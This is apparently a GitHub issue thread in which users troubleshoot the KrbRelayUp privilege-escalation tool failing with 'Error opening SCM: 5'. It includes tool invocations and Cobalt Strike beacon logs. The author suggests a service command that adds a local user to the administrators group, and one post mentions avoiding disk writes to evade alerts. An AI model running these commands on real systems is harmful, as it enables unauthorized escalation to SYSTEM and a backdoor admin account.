Error opening SCM: 5

[frbor]

When I run the tool I get the error Error opening SCM: 5:

Do you have any idea what blocks this?

It looks like OpenSCManager fails https://github.com/Dec0ne/KrbRelayUp/blob/6564f0fbae1a8dc2fbf9232263e8b29cb8e2d5da/KrbRelayUp/KrbSCM.cs#L56 but not sure what can cause this?

For reference, when running the same command as administrator it runs without any error.

[c0pp3r]

I am actually having the same exact issue in a brand new detectionlab environment in azure. Everything works fine until that step and I get the same SCM: 5

[Dec0ne]

Can you confirm that the high priv ticket was imported? (Use klist command) If so, try to run krbrelayup.exe krbscm after getting this error and making sure that the ticket is indeed in klist. Let me know if that helps.

[frbor]

Thanks for replying to this issue!

I confirm that I have a ticket which I can find using klist:

Cached Tickets: (1)

#0>     Client: Administrator @ (...)

Using KrbRelayUp.exe krbscm however, I get the same error:

KrbRelayUp.exe krbscm -s test-test2
KrbRelayUp - Relaying you to SYSTEM

[+] Using ticket to connect to Service Manger
[+] AcquireCredentialsHandleHook called for package N
[+] Changing to Kerberos package
[+] InitializeSecurityContextHook called for target H
[+] InitializeSecurityContext status = 0x00090312
[-] Error opening SCM: 5

[c0pp3r]

I have just confirmed the same thing as well!

beacon> shell klist [*] Tasked beacon to run: klist [+] host called home, sent: 36 bytes [+] received output:

Current LogonId is 0:0x363b460

Cached Tickets: (1)

0> Client: Administrator @ WINDOMAIN.LOCAL

Server: HOST/WIN10 @ WINDOMAIN.LOCAL
KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
Ticket Flags 0x40a10000 -> forwardable renewable pre_authent name_canonicalize 
Start Time: 5/10/2022 12:36:16 (local)
End Time:   5/10/2022 22:36:16 (local)
Renew Time: 5/17/2022 12:36:16 (local)
Session Key Type: AES-128-CTS-HMAC-SHA1-96
Cache Flags: 0 
Kdc Called: 

beacon> execute-assembly /Library/Tools/KrbRelayStuff/KrbRelayUp.exe krbscm [*] Tasked beacon to run .NET program: KrbRelayUp.exe krbscm [+] host called home, sent: 481847 bytes [+] received output: KrbRelayUp - Relaying you to SYSTEM

[+] Using ticket to connect to Service Manger [+] AcquireCredentialsHandleHook called for package N [+] Changing to Kerberos package [+] InitializeSecurityContextHook called for target H [+] InitializeSecurityContext status = 0x00090312 [+] InitializeSecurityContextHook called for target H [+] InitializeSecurityContext status = 0x00000000 [-] Error opening SCM: 5

[vysecurity]

Same, having this error.

[Dec0ne]

When using the tool from memory you have to specify --ServiceCommand since the default will be "{ToolPathOnDisk} system {DesktopSessionToSpawnCmdIn}" (ie: C:\Tools\KrbRelayUp.exe system 1) and since it's not on disk the service will fail upon execution. Try specifying --ServiceCommand "cmd.exe /c net user test QWERTY123 /add && net localgroup administrators test /add" for example.

[vysecurity]

Wonder if you've had a look at the U2U escalation using user account? @Dec0ne

[frbor]

Not sure if the comment above was related to this issue (since the tool is on disk), but I tried with --ServiceCommand argument as specified, and that did not help.

[c0pp3r]

@Dec0ne I've been using service command to execute a new instance of the beacon I dropped on disk, I also tried the new localgroup command you posted above and got the same result i posted previously.

[vysecurity]

Same, I've always used the sc command. We don't really use the spawn CMD thing because we don't drop files on disk as it could raise alerts easier.

[naksyn]

Same here, the issue for me is arising when I run from memory.

[mc-0815]

Hi,

I have exactly the same issue.

When debugging the network traffic I recognized that the rpc bind request ends up with a bind_nak response and the error code "Invalid checksum" which meaning is according to MS RPC Documentation (https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-rpce/6f81bffe-8fce-498a-addf-94654a57b329) "This rejection code is used when an unrecoverable error is detected by the underlying security package."

The ticket is in the cache, the user has local admin privilege. However the SCMUACBypass part seams to fail because of unknown reason.

Is anyone aware if there exists a specific (hardening) configuration would prevent leveraging hte ticket locally via SCMUACBypass?

Any ideas would be very appreciated. Thanks.